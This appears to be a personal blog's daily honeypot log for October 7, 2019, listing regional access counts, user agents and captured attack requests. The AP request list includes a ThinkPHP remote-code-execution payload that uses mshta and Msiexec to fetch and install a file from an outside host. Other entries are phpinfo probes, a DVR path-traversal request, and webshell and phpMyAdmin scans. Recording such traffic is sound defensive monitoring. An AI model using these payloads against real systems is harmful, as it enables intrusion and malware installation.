コンニチハレバレトシタアオゾラ

With nothing much to do, I spend the whole day facing my blog, aimlessly writing down the trivial things that drift through my mind,

2019/10/07 Honeypot (tentative) observation log

This is the honeypot (tentative) observation log for 2019/10/07.

Highlights
Region:AP

The following were observed:
Access attempts targeting the ThinkPHP vulnerability
Scanning activity against phpMyAdmin

Region:US

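The following were observed:
Access attempts targeting the HiSilicon DVR Devices vulnerability
Access attempts targeting the ThinkPHP vulnerability
Scanning activity against phpMyAdmin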

Region:EU

The following were observed:
Access attempts targeting the ThinkPHP vulnerability

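Access count trend

AP: total accesses: 287 (change from previous day: +247)
US: total accesses: 15 (change from previous day: -114)
EU: total accesses: 23 (change from previous day: +4)

For practical reasons, GET / HTTP/1.1 and POST / HTTP/1.1 are excluded.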

Region:AP

Source IP address list

UserAgent list

Count UserAgent
6 -
6 -
4 ApiTool
2 Go-http-client/1.1
6 Hi
19 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1)
3 Mozilla/5.0
1 Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)
2 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
3 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
1 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
97 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36
118 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36
2 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
2 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
1 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
9 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
2 Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
4 Mozilla/5.0 zgrab/0.x
1 python-requests/2.10.0
2 python-requests/2.22.0
1 ;s:3:\

Request list

Count Method Request Protocol
1 GET /shaAdmin/index.php HTTP/1.1
1 GET /shell?busybox HTTP/1.1
2 GET /shell.php HTTP/1.1
1 GET /shopdb/index.php HTTP/1.1
9 GET /?s=index%2F%5Cthink%5Capp%2Finvokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=mshta.exe%20vbscript:createobject(\"wscript.shell\").run(\"Cmd.exe%20/c%20for%20/l%20%i%20in%20(1,1,99)%20do%20(Msiexec%20/i%20http://Op[.]Cnazb[.]Xyz/PHP1.jpg%20/Q)\",0)(window.close)
1 GET /s/index.php HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /spider.php HTTP/1.1
1 GET /sqladmin/index.php HTTP/1.1
1 GET /sql/index.php HTTP/1.1
1 GET /SQL/index.php HTTP/1.1
1 GET /t6nv.php HTTP/1.1
1 GET /taisui.php HTTP/1.1
2 GET /test.php HTTP/1.1
1 GET /text.php HTTP/1.1
1 GET /tools/phpMyAdmin/index.php HTTP/1.1
3 GET /TP/index.php HTTP/1.1
2 GET /TP/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
4 GET /TP/public/index.php HTTP/1.1
1 GET /typo3/phpmyadmin/index.php HTTP/1.1
1 GET /undx.php HTTP/1.1
1 GET /uploader.php HTTP/1.1
1 GET /up.php HTTP/1.1
1 GET /v/index.php HTTP/1.1
1 GET /weathermap/editor.php HTTP/1.1
2 GET /webdav/ HTTP/1.1
1 GET /web/phpMyAdmin/index.php HTTP/1.1
1 GET /websql/index.php HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
1 GET /woshimengmei.php HTTP/1.1
1 GET /wp-config.php HTTP/1.1
1 GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php HTTP/1.1
1 GET /wpc.php HTTP/1.1
1 GET /wpo.php HTTP/1.1
1 GET /www/phpMyAdmin/index.php HTTP/1.1
1 GET /WWW/phpMyAdmin/index.php HTTP/1.1
1 GET /xampp/phpmyadmin/index.php HTTP/1.1
1 GET /xiaoxia.php HTTP/1.1
1 GET /xiaxia.php HTTP/1.1
1 GET /xiu.php HTTP/1.1
1 GET /x.php HTTP/1.1
1 GET /xsser.php HTTP/1.1
1 GET /yu.php HTTP/1.1
1 GET /yuyang.php HTTP/1.1
1 GET /z.php HTTP/1.1
1 GET /zz.php HTTP/1.1
1 GET /zzz.php HTTP/1.1
1 POST /%75%73%65%72%2e%70%68%70 HTTP/1.1
4 POST /editBlackAndWhiteList HTTP/1.1
1 POST /function.inc.php HTTP/1.1
1 POST /sample.php HTTP/1.1
2 POST /TP/index.php?s=captcha HTTP/1.1
1 PROPFIND / HTTP/1.1

Region:US

Source IP address list

UserAgent list

Count UserAgent
1 -
1 ApiTool
3 Hi
5 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1)
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36
2 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
2 Mozilla/5.0 zgrab/0.x

Request list

Count Method Request Protocol
1 GET /auth1.html HTTP/1.1
1 GET /index.php HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /manager/text/list HTTP/1.1
1 GET ../../mnt/custom/ProductDefinition HTTP
3 GET /Pages/login.htm HTTP/1.1
1 GET /phpmyadmin/index.php HTTP/1.1
5 GET /public/index.php?s=index\/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 POST /editBlackAndWhiteList HTTP/1.1

Region:EU

Source IP address list

UserAgent list

Count UserAgent
4 -
1 ApiTool
2 curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.27.1 zlib/1.2.3 libidn/1.18 libssh2/1.4.2
1 Go-http-client/1.1
5 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1)
1 Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
9 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)

Request list

Count Method Request Protocol
1 -
1 CONNECT xui.ptlogin2.qq.com:443 HTTP/1.1
1 GET /elrekt.php HTTP/1.1
1 GET /getip HTTP/1.1
1 GET /html/public/index.php HTTP/1.1
2 GET /index.php HTTP/1.1
1 GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /public/index.php HTTP/1.1
5 GET /public/index.php?s=index\/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /thinkphp/html/public/index.php HTTP/1.1
1 GET /TP/html/public/index.php HTTP/1.1
1 GET /TP/index.php HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
1 GET /VSR3/extjs/ext-all-js/ext.axd?v=21133 HTTP/1.1
1 GET /VSR3/Forms/Login/Login.aspx HTTP/1.1
1 OPTION / HTTP/1.1
1 POST /editBlackAndWhiteList HTTP/1.1
1 POST /index.php?s=captcha HTTP/1.1